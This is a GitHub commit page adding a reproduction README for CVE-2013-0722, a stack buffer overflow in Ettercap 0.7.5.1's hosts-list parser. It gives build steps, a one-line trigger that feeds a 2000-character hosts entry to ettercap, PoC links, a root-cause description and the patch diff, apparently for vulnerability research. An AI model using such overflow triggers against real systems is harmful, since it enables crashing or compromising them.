Skip to content

Commit

Permalink
add information for CVE-2013-0722
Browse files Browse the repository at this point in the history
  • Loading branch information
@mudongliang
mudongliang committed May 19, 2018
1 parent a1c67f8 commit 89592c1
Show file tree
Hide file tree
Showing 2 changed files with 50 additions and 1 deletion.
49 changes: 49 additions & 0 deletions CVE-2013-0722/README.md
View file
Expand Up @@ -2,14 +2,63 @@


## Experiment Environment ## Experiment Environment


Ubuntu 14.04.5

Kali Linux

Ubuntu 12.04

## INSTALL & Configuration ## INSTALL & Configuration


```
wget https://github.com/mudongliang/source-packages/raw/master/CVE-2013-0722/ettercap-0.7.5.1.tar.gz
tar -xvf ettercap-0.7.5.1.tar.gz
cd ettercap-0.7.5.1
mkdir build
cd build
cmake ../
make
```


## Problems in Installation & Configuration ## Problems in Installation & Configuration



## How to trigger vulnerability ## How to trigger vulnerability


```
cd src/
sudo ruby -e'puts"a"*2000' > overflow && sudo ettercap -T -j overflow
```

## PoCs ## PoCs


[Ettercap 0.7.5.1 - Stack Overflow](https://www.exploit-db.com/exploits/23945/)

[Ettercap Multiple Stack Buffer Overflow Vulnerabilities](https://www.securityfocus.com/bid/57175/exploit) **Note:** this poc description has some unmalformed html element.

## Vulnerability Patch ## Vulnerability Patch


### Root Cause

A stack-based buffer overflow was reported [1],[2] in Ettercap <= 0.7.5.1. A boundary error within the scan_load_hosts() function (in src/ec_scan.c), when parsing entries from a hosts list, could be exploited to cause a stack-based buffer overflow via an overly long entry. In order to exploit this, a user must be tricked into loading a malicious host file.

### Stack Trace

### Patch

--- EC-vulnerable/src/ec_scan.c
+++ EC-fixed/src/ec_scan.c
@@ -630,7 +630,7 @@
for (nhosts = 0; !feof(hf); nhosts++) {
int proto;

- if (fscanf(hf, "%s %s %s\n", ip, mac, name) != 3 ||
+ if (fscanf(hf, "%"EC_TOSTRING(MAX_ASCII_ADDR_LEN)"s %"EC_TOSTRING(ETH_ASCII_ADDR_LEN)"s %"EC_TOSTRING(MAX_HOSTNAME_LEN)"s\n", ip, mac, name) != 3 ||
*ip == '#' || *mac == '#' || *name == '#')
continu

## References ## References

[CVE-2013-0722 ettercap: stack-based buffer overflow when parsing hosts list](https://bugzilla.redhat.com/show_bug.cgi?id=894092)
2 changes: 1 addition & 1 deletion README.md
View file
Expand Up @@ -147,7 +147,7 @@ If the vulnerability has both CVE-ID and EDB-ID, CVE-ID is preferred as its dire
- [x] CVE-2013-0221 - [x] CVE-2013-0221
- [x] CVE-2013-0222 - [x] CVE-2013-0222
- [x] CVE-2013-0223 - [x] CVE-2013-0223
- [ ] CVE-2013-0722 - [x] CVE-2013-0722
- [x] CVE-2013-2028 - [x] CVE-2013-2028
- [ ] CVE-2013-2131 - [ ] CVE-2013-2131
- [ ] CVE-2013-3724 - [ ] CVE-2013-3724
Expand Down

0 comments on commit 89592c1

Please sign in to comment.